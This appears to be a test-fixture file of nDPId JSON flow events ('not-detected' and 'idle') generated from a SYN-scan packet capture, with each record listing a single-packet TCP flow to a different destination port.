+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3659,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3659,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52822,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52822,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5730,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5730,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5730,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5730,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3689,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1641,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1641,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3689,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1093,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1093,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1641,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1641,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52848,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 